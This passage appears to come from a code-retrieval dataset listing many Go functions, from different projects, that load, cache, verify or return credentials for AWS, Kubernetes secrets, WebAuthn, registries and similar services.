ctx.Value(\"creds\").(*CredentialsCookie)\n\treturn creds\n}", "func GetCredentials(env string) (credentials.Credential, error) {\n\t// get tokens or login\n\tstore, err := credentials.GetDefaultCredentialStore()\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\n\tif !utils.APIMExistsInEnv(env, utils.MainConfigFilePath) {\n\t\tfmt.Println(\"APIM does not exists in\", env, \"Add it using add env\")\n\t\tos.Exit(1)\n\t}\n\n\t// check for creds\n\tif !store.HasAPIM(env) {\n\t\tfmt.Println(\"Login to APIM in\", env)\n\t\terr = runLogin(store, env, \"\", \"\")\n\t\tif err != nil {\n\t\t\treturn credentials.Credential{}, err\n\t\t}\n\t\tfmt.Println()\n\t}\n\tcred, err := store.GetAPIMCredentials(env)\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\treturn cred, nil\n}", "func (b *Base) GetCredentials(ctx context.Context) (*Credentials, error) {\n\tvalue := ctx.Value(contextCredentialsFlag)\n\tif value != nil {\n\t\tctxCredStore, ok := value.(*contextCredentialsStore)\n\t\tif !ok {\n\t\t\treturn &Credentials{}, errContextCredentialsFailure\n\t\t}\n\n\t\tcreds := ctxCredStore.Get()\n\t\tif err := b.CheckCredentials(creds, true); err != nil {\n\t\t\treturn creds, fmt.Errorf(\"context credentials issue: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\terr := b.CheckCredentials(b.API.credentials, false)\n\tif err != nil {\n\t\treturn &Credentials{}, err\n\t}\n\tsubAccountOverride, ok := ctx.Value(contextSubAccountFlag).(string)\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tcreds := *b.API.credentials\n\tif ok {\n\t\tcreds.SubAccount = subAccountOverride\n\t}\n\treturn &creds, nil\n}", "func (doWebAuthn WebAuthn) GetCredentials(authenticatorID webauthn.AuthenticatorID) (retCredentials []*webauthn.Credential, err error) {\n\tb := webauthn.GetCredentials(authenticatorID)\n\treturn b.Do(doWebAuthn.ctxWithExecutor)\n}", "func (c *contextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func (c *ContextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func GetCredentials(req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCredentialServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tdataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{\n\t\tDatasetId: req.Context.DataSetID,\n\t\tAppId: utils.CreateAppIdentifier(input)})\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.Credentials = dataCredentials\n\n\treturn nil\n}", "func (l *DatabaseCrendentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tcredentials := sqlstore.GetCredentials(clusterId)\n\treturn credentials, nil\n}", "func GetCredentials(datasetID string, req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCredentialServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tdataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{\n\t\tDatasetId: datasetID,\n\t\tAppId: utils.CreateAppIdentifier(input)})\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.Credentials = dataCredentials.DeepCopy()\n\n\treturn nil\n}", "func (k *Kluster) GetCredentials() ([]string, error) {\n\tcredentials, err := k.loadCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// k.ui.Log.Debugf(\"credentials load from environment for platform %s. (%v)\", credentials.platform(), credentials.parameters())\n\t// assign the credentials to the cluster provisioner\n\tparams := credentials.parameters()\n\t// k.Credentials(params...)\n\n\treturn params, nil\n}", "func (o *Command) GetCredentials(rw io.Writer, req io.Reader) command.Error {\n\tvcRecords, err := o.verifiableStore.GetCredentials()\n\tif err != nil {\n\t\tlogutil.LogError(logger, CommandName, GetCredentialsCommandMethod, \"get credential records : \"+err.Error())\n\n\t\treturn command.NewValidationError(GetCredentialsErrorCode, fmt.Errorf(\"get credential records : %w\", err))\n\t}\n\n\tcommand.WriteNillableResponse(rw, &RecordResult{\n\t\tResult: vcRecords,\n\t}, logger)\n\n\tlogutil.LogDebug(logger, CommandName, GetCredentialsCommandMethod, \"success\")\n\n\treturn nil\n}", "func Get(program ProgramFunc, serverURL string) (*credentials.Credentials, error) {\n\tcmd := program(\"get\")\n\tcmd.Input(strings.NewReader(serverURL))\n\n\tout, err := cmd.Output()\n\tif err != nil {\n\t\tt := strings.TrimSpace(string(out))\n\n\t\tif credentials.IsErrCredentialsNotFoundMessage(t) {\n\t\t\treturn nil, credentials.NewErrCredentialsNotFound()\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"error getting credentials - err: %v, out: `%s`\", err, t)\n\t}\n\n\tresp := &credentials.Credentials{\n\t\tServerURL: serverURL,\n\t}\n\n\tif err := json.NewDecoder(bytes.NewReader(out)).Decode(resp); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func (o *Service) GetCredentials() map[string]map[string]bool {\n\tif o == nil || o.Credentials == nil {\n\t\tvar ret map[string]map[string]bool\n\t\treturn ret\n\t}\n\treturn *o.Credentials\n}", "func GetCredentials(isExternal bool) *credentials.Credentials {\n\tmu.Lock()\n\tif credentialChain == nil {\n\t\tcredProviders := defaults.CredProviders(defaults.Config(), defaults.Handlers())\n\t\tcredProviders = append(credProviders, providers.NewRotatingSharedCredentialsProvider())\n\t\tcredentialChain = credentials.NewCredentials(&credentials.ChainProvider{\n\t\t\tVerboseErrors: false,\n\t\t\tProviders: credProviders,\n\t\t})\n\t}\n\tmu.Unlock()\n\n\t// credentials.Credentials is concurrency-safe, so lock not needed here\n\tv, err := credentialChain.Get()\n\tif err != nil {\n\t\tseelog.Errorf(\"Error getting ECS instance credentials from default chain: %s\", err)\n\t} else {\n\t\tseelog.Infof(\"Successfully got ECS instance credentials from provider: %s\", v.ProviderName)\n\t}\n\treturn credentialChain\n}", "func (l *FixtureCredentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tresult := l.credentials[clusterId]\n\tif result == nil {\n\t\treturn nil, fmt.Errorf(\"credentials not found for %s\", clusterId)\n\t}\n\treturn result, nil\n}", "func (om *Sdk) GetCredentials(name, credential string) (*SimpleCredential, error) {\n\tproductGUID, err := om.productGUIDByType(name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tout, err := om.api.GetDeployedProductCredential(api.GetDeployedProductCredentialInput{\n\t\tDeployedGUID: productGUID,\n\t\tCredentialReference: credential,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &SimpleCredential{\n\t\tIdentity: out.Credential.Value[\"identity\"],\n\t\tPassword: out.Credential.Value[\"password\"],\n\t}, nil\n}", "func (c *WebAuthn) GetCredentials(authenticatorId string) ([]*WebAuthnCredential, error) {\n\tvar v WebAuthnGetCredentialsParams\n\tv.AuthenticatorId = authenticatorId\n\treturn c.GetCredentialsWithParams(&v)\n}", "func (dsc *DataSourceConfig) GetCredentials() *Credentials {\n\tif num := len(dsc.creds); num > 0 {\n\t\tvar creds []*Credentials\n\t\tfor _, c := range dsc.creds {\n\t\t\tcreds = append(creds, c)\n\t\t}\n\t\treturn creds[rand.Intn(num)]\n\t}\n\treturn nil\n}", "func credentials() *centrifuge.Credentials {\n\t// Never show secret to client of your application. Keep it on your application backend only.\n\tsecret := \"secret\"\n\t// Application user ID.\n\tuser := \"42\"\n\t// Current timestamp as string.\n\ttimestamp := centrifuge.Timestamp()\n\t// Empty info.\n\tinfo := \"\"\n\t// Generate client token so Centrifugo server can trust connection parameters received from client.\n\ttoken := auth.GenerateClientToken(secret, user, timestamp, info)\n\n\treturn &centrifuge.Credentials{\n\t\tUser: user,\n\t\tTimestamp: timestamp,\n\t\tInfo: info,\n\t\tToken: token,\n\t}\n}", "func (m *DeviceLocalCredentialInfo) GetCredentials()([]DeviceLocalCredentialable) {\n val, err := m.GetBackingStore().Get(\"credentials\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.([]DeviceLocalCredentialable)\n }\n return nil\n}", "func (CcsAwsSession *ccsAwsSession) GetCredentials() (*credentials.Value, error) {\n\tif err := CcsAwsSession.GetAWSSessions(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create aws session to retrieve credentials: %v\", err)\n\t}\n\n\tcreds, err := CcsAwsSession.session.Config.Credentials.Get()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get aws credentials: %v\", err)\n\t}\n\treturn &creds, nil\n}", "func (p *TempCredentialsProvider) Credentials() (*aws.Credentials, error) {\n\tif time.Now().After(p.nextRefresh) {\n\t\terr := p.Refresh()\n\t\tif err != nil {\n\t\t\t// Retry next time around - don't wait for p.Duration to elapse.\n\t\t\tlog.Printf(\"TempCredentialsProvider failed to refresh credentials: %s\\n\", err)\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Schedule next refresh 5 minutes before the credentials are due to expire.\n\t\tp.nextRefresh = time.Now().Add(p.Duration - (5 * time.Minute))\n\t}\n\n\t// Transpose the temporary sts.Credentials into aws.Credentials.\n\treturn &aws.Credentials{\n\t\tAccessKeyID: *p.role.Credentials.AccessKeyID,\n\t\tSecretAccessKey: *p.role.Credentials.SecretAccessKey,\n\t\tSessionToken: *p.role.Credentials.SessionToken,\n\t}, nil\n}", "func (handler *Handler) GetCredentials(ctx context.Context, _ *sync.WaitGroup, startupTimer startup.Timer,\n\tdic *di.Container) bool {\n\tlc := bootstrapContainer.LoggingClientFrom(dic.Get)\n\tconfig := container.ConfigurationFrom(dic.Get)\n\tsecretProvider := bootstrapContainer.SecretProviderFrom(dic.Get)\n\n\tvar credentials *bootstrapConfig.Credentials\n\n\tfor startupTimer.HasNotElapsed() {\n\t\t// retrieve mosquitto credentials from secretstore\n\t\tsecrets, err := secretProvider.GetSecret(config.SecureMosquitto.SecretName)\n\t\tif err == nil {\n\t\t\tcredentials = &bootstrapConfig.Credentials{\n\t\t\t\tUsername: secrets[secret.UsernameKey],\n\t\t\t\tPassword: secrets[secret.PasswordKey],\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\n\t\tlc.Warnf(\"Could not retrieve mosquitto credentials (startup timer has not expired): %s\", err.Error())\n\t\tstartupTimer.SleepForInterval()\n\t}\n\n\tif credentials == nil {\n\t\tlc.Error(\"Failed to retrieve mosquitto credentials before startup timer expired\")\n\t\treturn false\n\t}\n\n\thandler.credentials = *credentials\n\treturn true\n}", "func (p *credentialProvider) Retrieve() (aws.Credentials, error) {\n\tawscred := aws.Credentials{\n\t\tSecretAccessKey: p.SecretAccessKey,\n\t\tAccessKeyID: p.AccessKeyID,\n\t}\n\n\treturn awscred, nil\n}", "func (c *Client) Credentials() string {\n\ts0 := hex.EncodeToString(c.i)\n\ts1 := hex.EncodeToString(c.A.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (w *ServerInterfaceWrapper) GetCredentials(ctx echo.Context) error {\n\tvar err error\n\t// ------------- Path parameter \"id\" -------------\n\tvar id int\n\n\terr = runtime.BindStyledParameter(\"simple\", false, \"id\", ctx.Param(\"id\"), &id)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, fmt.Sprintf(\"Invalid format for parameter id: %s\", err))\n\t}\n\n\tctx.Set(\"OAuth.Scopes\", []string{\"\"})\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.GetCredentials(ctx, id)\n\treturn err\n}", "func (mds *metadataService) getCredentials(w http.ResponseWriter, r *http.Request) {\n\tcreds, err := mds.creds.GetCredentials()\n\tif err != nil {\n\t\tw.WriteHeader(500)\n\t\tfmt.Fprint(w, err.Error())\n\t\treturn\n\t}\n\n\tresp := &securityCredentialsResponse{\n\t\tCode: \"Success\",\n\t\tLastUpdated: time.Now().UTC().Format(time.RFC3339),\n\t\tType: \"AWS-HMAC\",\n\t\tAccessKeyId: *creds.AccessKeyId,\n\t\tSecretAccessKey: *creds.SecretAccessKey,\n\t\tToken: *creds.SessionToken,\n\t\tExpiration: creds.Expiration.UTC().Format(time.RFC3339),\n\t}\n\trespBody, err := json.Marshal(resp)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tw.Write(respBody)\n}", "func (g *Git) GetRemoteCredentials(c *cli.Context) (string, string, string, error) {\n\tif c.GlobalString(\"token\") == \"\" {\n\t\treturn \"\", \"\", \"\", errors.New(\"Flag `--token` not set.\\nPlease provide a personal access token via flag `--token` or environment variable `GCHL_GITHUB_TOKEN`\")\n\t}\n\n\tif remote := c.GlobalString(\"remote\"); remote != \"\" {\n\t\tuser, repo, err := parseRemoteString(remote)\n\t\treturn user, repo, c.GlobalString(\"token\"), err\n\t}\n\n\tremotes, err := g.repo.Remotes()\n\tif err != nil {\n\t\treturn \"\", \"\", \"\", err\n\t}\n\n\tif len(remotes) == 0 {\n\t\treturn \"\", \"\", \"\", errors.New(\"No `--remote` flag provided and current repository does not have a remote origin\")\n\t}\n\n\tremote := remotes[0].Config().URLs[0]\n\tuser, repo, err := parseRemoteString(remote)\n\treturn user, repo, c.GlobalString(\"token\"), err\n}", "func GetCredential(c *Credentials) error {\n\trow, cancel, err := db.ConnManager.QueryRow(sqlCredentialsGet, c.Id)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer cancel()\n\tc.Site = &sites.Site{}\n\tif err := row.Scan(&c.Id, &c.Login, &c.Password, &c.Site.Id, &c.Site.Name, &c.Site.Host); err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *Client) V2GetCredentials(ctx context.Context, params *V2GetCredentialsParams) (*V2GetCredentialsOK, error) {\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"V2GetCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v2/clusters/{cluster_id}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &V2GetCredentialsReader{formats: a.formats},\n\t\tAuthInfo: a.authInfo,\n\t\tContext: ctx,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*V2GetCredentialsOK), nil\n\n}", "func (s *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(s.salt)\n\ts1 := hex.EncodeToString(s.xB.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (c *Client) Credentials() string {\n\tvar b bytes.Buffer\n\n\tb.WriteString(hex.EncodeToString(c.i))\n\tb.WriteByte(':')\n\tb.WriteString(hex.EncodeToString(c.xA.Bytes()))\n\treturn b.String()\n}", "func GetCredentialsFile() (*CredentialsFile, error) {\n\thome := func() string {\n\t\tif runtime.GOOS == \"windows\" {\n\t\t\treturn os.Getenv(\"USERPROFILE\")\n\t\t}\n\t\treturn os.Getenv(\"HOME\")\n\t}\n\tpath := filepath.Join(home(), \".aws\", \"credentials\")\n\tif p := os.Getenv(\"AWS_SHARED_CREDENTIALS_FILE\"); len(p) > 0 {\n\t\tpath = p\n\t}\n\tini.DefaultHeader = true\n\tf, err := ini.InsensitiveLoad(path)\n\treturn &CredentialsFile{f, path}, err\n}", "func (t *Application) cliCredentials() (*credentials.Credentials, error) {\n\tif *t.Token != \"\" && *t.Hub == \"\" {\n\t\treturn nil, trace.BadParameter(\"--hub flag must be provided if --token flag is provided\")\n\t}\n\tif *t.Hub != \"\" {\n\t\treturn credentials.FromTokenAndHub(*t.Token, *t.Hub), nil\n\t}\n\treturn nil, trace.NotFound(\"no CLI credentials provided\")\n}", "func (w *Registration) Credentials() (Credentials, error) {\n\tw.mutex.Lock()\n\tcred := w.curCredentials\n\tw.mutex.Unlock()\n\tif cred == nil {\n\t\treturn Credentials{}, errors.New(\"Not ready\")\n\t}\n\treturn *cred, nil\n}", "func (in *Credentials) DeepCopy() *Credentials {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Credentials)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (c *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(c.s)\n\ts1 := hex.EncodeToString(c.B.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (p *PorterHelper) Get(serverURL string) (user string, secret string, err error) {\n\treturn p.AuthGetter.GetCredentials(serverURL)\n}", "func NewCredentials() *Credentials {\n\t// TODO savefile\n\treturn &Credentials{users: map[string]string{}}\n}", "func (p *CredentialsCache) Retrieve(ctx context.Context) (Credentials, error) {\n\tif creds := p.getCreds(); creds != nil {\n\t\treturn *creds, nil\n\t}\n\n\tresCh := p.sf.DoChan(\"\", func() (interface{}, error) {\n\t\treturn p.singleRetrieve(&suppressedContext{ctx})\n\t})\n\tselect {\n\tcase res := <-resCh:\n\t\treturn res.Val.(Credentials), res.Err\n\tcase <-ctx.Done():\n\t\treturn Credentials{}, &RequestCanceledError{Err: ctx.Err()}\n\t}\n}", "func Credentials(ctx context.Context, scopes ...string) *google.Credentials {\n\treturn CredentialsEnv(ctx, envPrivateKey, scopes...)\n}", "func (s *SendPaymentFormRequest) GetCredentials() (value InputCredentialsClass) {\n\tif s == nil {\n\t\treturn\n\t}\n\treturn s.Credentials\n}", "func GetCredentialsSecret(coreClient client.Client, namespace string, secretName string) (*Creds, error) {\n\tvar credentialsSecret apicorev1.Secret\n\tkey := client.ObjectKey{Namespace: namespace, Name: secretName}\n\n\tif err := coreClient.Get(context.Background(), key, &credentialsSecret); err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\treturn nil, fmt.Errorf(\n\t\t\t\t\"error credentials secret %s not found in namespace %s: %w\", secretName, namespace, err)\n\t\t}\n\t\treturn nil, fmt.Errorf(\n\t\t\t\"error getting credentials secret %s in namespace %s: %w\", secretName, namespace, err)\n\t}\n\n\to := Creds{}\n\to.URL = string(credentialsSecret.Data[UrlField])\n\to.Username = string(credentialsSecret.Data[UsernameField])\n\to.Password = string(credentialsSecret.Data[PasswordField])\n\to.CAFile = string(credentialsSecret.Data[CafileField])\n\tinsecure, err := strconv.ParseBool(string(credentialsSecret.Data[InsecureField]))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to identify %s in credentials %w\", InsecureField, err)\n\t}\n\to.Insecure = insecure\n\to.CABundle = string(credentialsSecret.Data[CaBundleField])\n\n\t// write CA bundle to a file if exist.\n\t// its best if we could mount the secret into a file,\n\t// but this controller deployment cannot\n\tif o.CABundle != \"\" {\n\t\tcaFilePath, err := writeCA(strings.NewReader(o.CABundle))\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"failed to extract and store the CA %s\", err)\n\t\t\treturn nil, err\n\t\t}\n\t\to.CAFile = caFilePath\n\t}\n\treturn &o, nil\n}", "func (t *AuthorizationTransport) GetCredential() (string, string, string) {\n\tt.rwLocker.RLock()\n\tdefer t.rwLocker.RUnlock()\n\treturn t.SecretID, t.SecretKey, t.SessionToken\n}", "func (auth *JWTAuth) GetCreds() []string {\n\tcreds := []string{auth.JWT}\n\treturn creds\n}", "func setCredentials() *credentials.Credentials {\n\t// First, try the credentials file set by AWS CLI tool.\n\t// Note the empty string instructs to look under default file path (different based on OS).\n\t// This file can have multiple profiles and a default profile will be used unless otherwise configured.\n\t// See: https://godoc.org/github.com/aws/aws-sdk-go/aws/credentials#SharedCredentialsProvider\n\tcreds := credentials.NewSharedCredentials(\"\", cfg.AWS.Profile)\n\n\t// Second, use environment variables if set. The following are checked:\n\t// Access Key ID: AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY\n\t// Secret Access Key: AWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY\n\tenvCreds := credentials.NewEnvCredentials()\n\tsetCreds, _ := envCreds.Get()\n\t// error apparently does not return if environment variables weren't set\n\t// so check what was set and look for empty strings, don't want to set empty creds\n\tif setCreds.AccessKeyID != \"\" && setCreds.SecretAccessKey != \"\" {\n\t\tcreds = envCreds\n\t}\n\n\t// Last, if credentials were passed via CLI, always prefer those\n\tif cfg.AWS.AccessKeyID != \"\" && cfg.AWS.SecretAccessKey != \"\" {\n\t\tcreds = credentials.NewStaticCredentials(cfg.AWS.AccessKeyID, cfg.AWS.SecretAccessKey, \"\")\n\t}\n\n\treturn creds\n}", "func RetrieveCreds(accessKey, secretKey, sessionToken string, logger logr.Logger) (*credentials.Credentials, error) {\n\tcredConfig := &CredentialsConfig{\n\t\tAccessKey: accessKey,\n\t\tSecretKey: secretKey,\n\t\tSessionToken: sessionToken,\n\t\tlog: logger,\n\t}\n\tcreds, err := credConfig.GenerateCredentialChain()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif creds == nil {\n\t\treturn nil, fmt.Errorf(\"could not compile valid credential providers from static config, environment, shared, or instance metadata\")\n\t}\n\n\t_, err = creds.Get()\n\tif err != nil {\n\t\treturn nil, errwrap.Wrapf(\"failed to retrieve credentials from credential chain: {{err}}\", err)\n\t}\n\treturn creds, nil\n}", "func GetCredentialsServer() CredentialsServer {\n\tcs, ok := AllCredentialsServers[dbCredentialsServer]\n\tif !ok {\n\t\tlog.Exitf(\"Invalid credential server: %v\", dbCredentialsServer)\n\t}\n\treturn cs\n}", "func (c *Client) ListMyCredentials() ([]*api.Credential, error) {\n\tvar out []*api.Credential\n\trawURL := fmt.Sprintf(pathCredentials, c.base.String())\n\terr := c.get(rawURL, true, &out)\n\treturn out, errio.Error(err)\n}", "func (auth *KeySecretAuth) GetCreds() []string {\n\tcreds := []string{auth.apiKey, auth.apiSecret}\n\treturn creds\n}", "func NewCredentialsProvider(\n\tgetCredentials CredentialsCallback,\n\tverifyCredentials VerifyCredentialsCallback,\n\tchooseCredentialHelper ChooseCredentialHelperCallback) CredentialsProvider {\n\n\tif verifyCredentials == nil {\n\t\tverifyCredentials = CheckAuth\n\t}\n\n\tif chooseCredentialHelper == nil {\n\t\tchooseCredentialHelper = func(available []string) (string, error) {\n\t\t\treturn \"\", nil\n\t\t}\n\t}\n\n\tauthFilePath := filepath.Join(fn.ConfigPath(), \"auth.json\")\n\tsys := &containersTypes.SystemContext{\n\t\tAuthFilePath: authFilePath,\n\t}\n\n\thome, err := os.UserHomeDir()\n\tif err != nil {\n\t\tpanic(err)\n\t\t//return result, fmt.Errorf(\"failed to determine home directory: %w\", err)\n\t}\n\tdockerConfigPath := filepath.Join(home, \".docker\", \"config.json\")\n\n\treturn func(ctx context.Context, registry string) (Credentials, error) {\n\t\tresult := Credentials{}\n\n\t\tfor _, load := range []func() (containersTypes.DockerAuthConfig, error){\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn config.GetCredentials(sys, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(authFilePath, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(dockerConfigPath, registry)\n\t\t\t},\n\t\t} {\n\t\t\tvar credentials containersTypes.DockerAuthConfig\n\t\t\tcredentials, err = load()\n\n\t\t\tif err != nil && !errors.Is(err, errCredentialsNotFound) {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\tif credentials != (containersTypes.DockerAuthConfig{}) {\n\t\t\t\tresult.Username, result.Password = credentials.Username, credentials.Password\n\n\t\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\t\tif err == nil {\n\t\t\t\t\treturn result, nil\n\t\t\t\t} else {\n\t\t\t\t\tif !errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfor {\n\t\t\tresult, err = getCredentials(registry)\n\t\t\tif err != nil {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\tif err == nil {\n\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tif !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelpers := listCredentialHelpers()\n\t\t\t\t\thelper, err := chooseCredentialHelper(helpers)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelper = strings.TrimPrefix(helper, \"docker-credential-\")\n\t\t\t\t\terr = setCredentialHelperToConfig(authFilePath, helper)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, fmt.Errorf(\"faild to set the helper to the config: %w\", err)\n\t\t\t\t\t}\n\t\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\t\tif err != nil && !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn result, nil\n\t\t\t} else {\n\t\t\t\tif errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\t\t}\n\t}\n}", "func (mock *MailgunMock) GetCredentialsCalls() []struct {\n\tLimit int\n\tSkip int\n} {\n\tvar calls []struct {\n\t\tLimit int\n\t\tSkip int\n\t}\n\tlockMailgunMockGetCredentials.RLock()\n\tcalls = mock.calls.GetCredentials\n\tlockMailgunMockGetCredentials.RUnlock()\n\treturn calls\n}", "func (pctx *processContext) gcpCredentials(ctx context.Context) (*google.Credentials, error) {\n\t// TODO(light): google.DefaultCredentials uses Getenv directly, so it is\n\t// difficult to disentangle to use processContext.\n\treturn gcp.DefaultCredentials(ctx)\n}", "func (c *WebAuthn) GetCredentialsWithParams(v *WebAuthnGetCredentialsParams) ([]*WebAuthnCredential, error) {\n\tresp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: \"WebAuthn.getCredentials\", Params: v})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar chromeData struct {\n\t\tResult struct {\n\t\t\tCredentials []*WebAuthnCredential\n\t\t}\n\t}\n\n\tif resp == nil {\n\t\treturn nil, &gcdmessage.ChromeEmptyResponseErr{}\n\t}\n\n\t// test if error first\n\tcerr := &gcdmessage.ChromeErrorResponse{}\n\tjson.Unmarshal(resp.Data, cerr)\n\tif cerr != nil && cerr.Error != nil {\n\t\treturn nil, &gcdmessage.ChromeRequestErr{Resp: cerr}\n\t}\n\n\tif err := json.Unmarshal(resp.Data, &chromeData); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn chromeData.Result.Credentials, nil\n}", "func Credentials() (string, string) {\n\tqs := []*survey.Question{\n\t\t{\n\t\t\tName: \"username\",\n\t\t\tPrompt: &survey.Input{Message: \"What is your username?\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t\t{\n\t\t\tName: \"password\",\n\t\t\tPrompt: &survey.Password{Message: \"Please enter your password.\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t}\n\n\tanswers := struct {\n\t\tUsername string\n\t\tPassword string\n\t}{}\n\n\terr := survey.Ask(qs, &answers)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn answers.Username, answers.Password\n}", "func (c *ClusterClient) Credentials() *CredentialsClient {\n\treturn NewCredentialsClient(\n\t\tc.transport,\n\t\tpath.Join(c.path, \"credentials\"),\n\t)\n}", "func (ctrler CtrlDefReactor) GetCredentialsWatchOptions() *api.ListWatchOptions {\n\tlog.Info(\"GetCredentialsWatchOptions is not implemented\")\n\topts := &api.ListWatchOptions{}\n\treturn opts\n}", "func ClientCredentials() *credentials.TransportCredentials {\n\treturn clientCredentials\n}", "func (sh *Shell) ForkCredentials(extensions ...string) *Credentials {\n\treturn sh.ForkCredentialsFromPrincipal(v23.GetPrincipal(sh.Ctx), extensions...)\n}", "func (m *Application) GetPasswordCredentials()([]PasswordCredentialable) {\n return m.passwordCredentials\n}", "func Get(helper Helper, reader io.Reader, writer io.Writer) error {\n\tscanner := bufio.NewScanner(reader)\n\n\tbuffer := new(bytes.Buffer)\n\tfor scanner.Scan() {\n\t\tbuffer.Write(scanner.Bytes())\n\t}\n\n\tif err := scanner.Err(); err != nil && err != io.EOF {\n\t\treturn err\n\t}\n\n\tserverURL := strings.TrimSpace(buffer.String())\n\tif len(serverURL) == 0 {\n\t\treturn NewErrCredentialsMissingServerURL()\n\t}\n\n\tusername, secret, err := helper.Get(serverURL)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuffer.Reset()\n\terr = 